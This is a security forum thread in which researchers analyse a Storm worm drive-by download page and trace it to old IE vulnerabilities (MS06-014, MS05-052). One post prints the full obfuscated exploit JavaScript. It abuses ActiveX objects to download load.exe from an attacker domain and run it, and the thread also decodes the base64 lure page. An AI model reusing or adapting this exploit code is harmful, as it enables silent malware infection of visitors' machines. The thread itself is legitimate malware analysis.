Storm worm using javascript to exploit right now!

[cjeremy]

The storm worm is using obfusticated javascript now to download a file called "load.exe".  I have not been completely successful at deobfusticating the code yet, but from what I can tell it is using the MS06-14 vulnerability.  If any of you experts want to look at the code and see what you can do with it I have it post on my blog: http://www.sudosecure.net/archives/47

Any help is appreciated... 

[bobby]

Unfortunatelly, I cant copy/paste the last line from PDF you posted.
It was too long to fit in one line.

My experience says that this kind of packs tries different exploits to get the same exe downloaded and started.
So, if you got the URL to exe from one of the exploits, you will probably get the same exe from the rest of the exploits.

Would you share the original web-page source with us, to see what can we get?
Null problemo if you can't.

[bobby]

OK, I got one of the sites spreading this: hxxp://loveinlive.cn

Code: [Select]

<script>

function CreateO(os, nz) {
var e0 = null;
      try {
eval('e0 = os.CreateObject(nz)') }catch(e){}
     if (! e0) {try { eval('e0 = os.CreateObject(nz, "")') }catch(e){}}
    if (! e0) {try { eval('e0 = os.CreateObject(nz, "", "")') }catch(e){}}
   if (! e0) {try { eval('e0 = os.GetObject("", nz)') }catch(e){}}
  if (! e0) {try { eval('e0 = os.GetObject(nz, "")') }catch(e){}}
 if (! e0) {try { eval('e0 = os.GetObject(nz)') }catch(e){}}
return(e0);
}

function Download(a)
{
var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
lm.open('G'+'E'+'T','http://loveinlive.cn//load.exe',false);
lm.send();
var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');

o.type = 1;
o.Mode = 3;
o.open();

o.Write(lm.responseBody);

var tut = ".//..//win"+".exe";
o.savetoFile(tut,2);
o.close();
var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
s.Shellexecute(tut);
}

var x = 0;
var t = new Array(

'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);

while (t[x]) {
var a = null;
   if (t[x].substring(0,1) == '{') {
a = document.createElement('object');
a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
}  else {
   try
{ a = new ActiveXObject(t[x]); } catch(e){}
}
   if (a)
{
   try
{
var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
if (b) {
if (Download(a)) break;
}
}catch(e){}
}
x++;
}
setTimeout("window.location = 'flow.php'", 2500);
</script>
<script>
var kgZAChfjuVm = {

_mcggqeqXM : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",

hazeQEzqfx : function (kZHqMLp) {
var output = "";
var chr1, chr2, chr3;
var sXfIQ, ccJPc, zpCX, wVYtK;
var i = 0;

kZHqMLp = kZHqMLp.replace(/[^A-Za-z0-9\+\/\=]/g, "");

while (i < kZHqMLp.length) {

sXfIQ = this._mcggqeqXM.indexOf(kZHqMLp.charAt(i++));
ccJPc = this._mcggqeqXM.indexOf(kZHqMLp.charAt(i++));
zpCX = this._mcggqeqXM.indexOf(kZHqMLp.charAt(i++));
wVYtK = this._mcggqeqXM.indexOf(kZHqMLp.charAt(i++));

chr1 = (sXfIQ << 2) | (ccJPc >> 4);
chr2 = ((ccJPc & 15) << 4) | (zpCX >> 2);
chr3 = ((zpCX & 3) << 6) | wVYtK;

output = output + this.__iHrHHunmdiHQ(chr1);

if (zpCX != 64) {
output = output + this.__iHrHHunmdiHQ(chr2);
}
if (wVYtK != 64) {
output = output + this.__iHrHHunmdiHQ(chr3);
}

}

output = kgZAChfjuVm._utf8_decode(output);

return output;

},
_utf8_decode : function (utftext) {
var string = "";
var i = 0;
var c = c1 = c2 = 0;

while ( i < utftext.length ) {

c = utftext.charCodeAt(i);

if (c < 128) {
string += this.__iHrHHunmdiHQ(c);
i++;
}
else if((c > 191) && (c < 224)) {
c2 = utftext.charCodeAt(i+1);
string += this.__iHrHHunmdiHQ(((c & 31) << 6) | (c2 & 63));
i += 2;
}
else {
c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2);
string += this.__iHrHHunmdiHQ(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3;
}

}

return string;
},
__abXGSBxpNgwF : function (__mDzaqdIx){
document.write(__mDzaqdIx);
 },
 
 __iHrHHunmdiHQ : function (__PhPtxUsnzq){
return String.fromCharCode(__PhPtxUsnzq);
 }

}

kgZAChfjuVm.__abXGSBxpNgwF(kgZAChfjuVm.hazeQEzqfx('PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTEiIC8+Cjx0aXRsZT5JIExvdmUgWW91PC90aXRsZT4KPGJvZHk+CjxjZW50ZXI+CjxhIGhyZWY9IlN0b3JtQ29kZWMuZXhlIj48aW1nIHNyYz0idmlkLmdpZiIgYm9yZGVyPSIwIj48YnI+PC9hPjxicj4KWW91IGhhdmUgbm8gU3Rvcm0gQ29kZWMgb24geW91ciBQQy4gPGJyPjxhIGhyZWY9IlN0b3JtQ29kZWM4LmV4ZSI+PGI+RG93bmxvYWQgaXQ8L2I+PGEvPiBhbmQgY2hvb3NlIGVpdGhlciAiT3BlbiIgb3IgIlJ1biIuIDxicj5FbmpveSB5b3VyIG11bHRpbWVkaWEgZXhwZXJpZW5jZSEKPC9jZW50ZXI+CjwvYm9keT4KPC9odG1sPg=='))</script>
I guess the problem was the last part of the code.
It decodes to:

Code: [Select]

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>I Love You</title>
<body>
<center>
<a href="StormCodec.exe"><img src="vid.gif" border="0"><br></a><br>
You have no Storm Codec on your PC. <br><a href="StormCodec8.exe"><b>Download it</b><a/> and choose either "Open" or "Run". <br>Enjoy your multimedia experience!
</center>
</body>
</html>
...which seems to be the original page source used a couple of days ago.
So, it will look like a redirection to old page, but in the fact it is a part of new code, obfuscated as a JavaScript function.

Tell me if my assumptions are wrong about what you missed to decode.

[cjeremy]

I was able to decode both the flow.php and the index file.  I came to the same conclusion as you.  Looks like to old exploits are being used the MS06-14 and MS05-052.  It's not a new thing for the authors of the storm worm to use exploits, but it has been months since they have done so. 

As far as the domains, all the ones I listed here: http://www.sudosecure.net/archives/46 are still active and will render this same code.  They are all apart of a large fast flux network, so you'll get a different IP on every visit.

--jeremy

[bobby]

Did you saw it is browser-dependent?
It will load these exploit if you use IE UserAgent string, but it will still load the old page if you use Firefox UA string.

[cjeremy]

Yea, that is actually what caused me to find this.  I have a bot that goes out and grabs the binary once an hour from Storm Worm web hosts, and it uses a fake windows User Agent...  Well long story short this morning when I got up my bot was going insane spawning off threads since it was parsing the javascript instead of the normal storm page.  I changed it to Firefox to get it back on track.  Thanks for verifying though, as I could have missed that.  Although I must say it is harder to miss stuff now that I use your tool

[tjs]

Very interesting discovery. Kudos to sudosecure for keeping us all in the know.

[tjs]

I wonder if the storm folks have started doing this again in order to increase their media popularity (along with botnet size), given that Kraken and Mega-D have been getting so much "omg it's bigger than storm" press...

TJS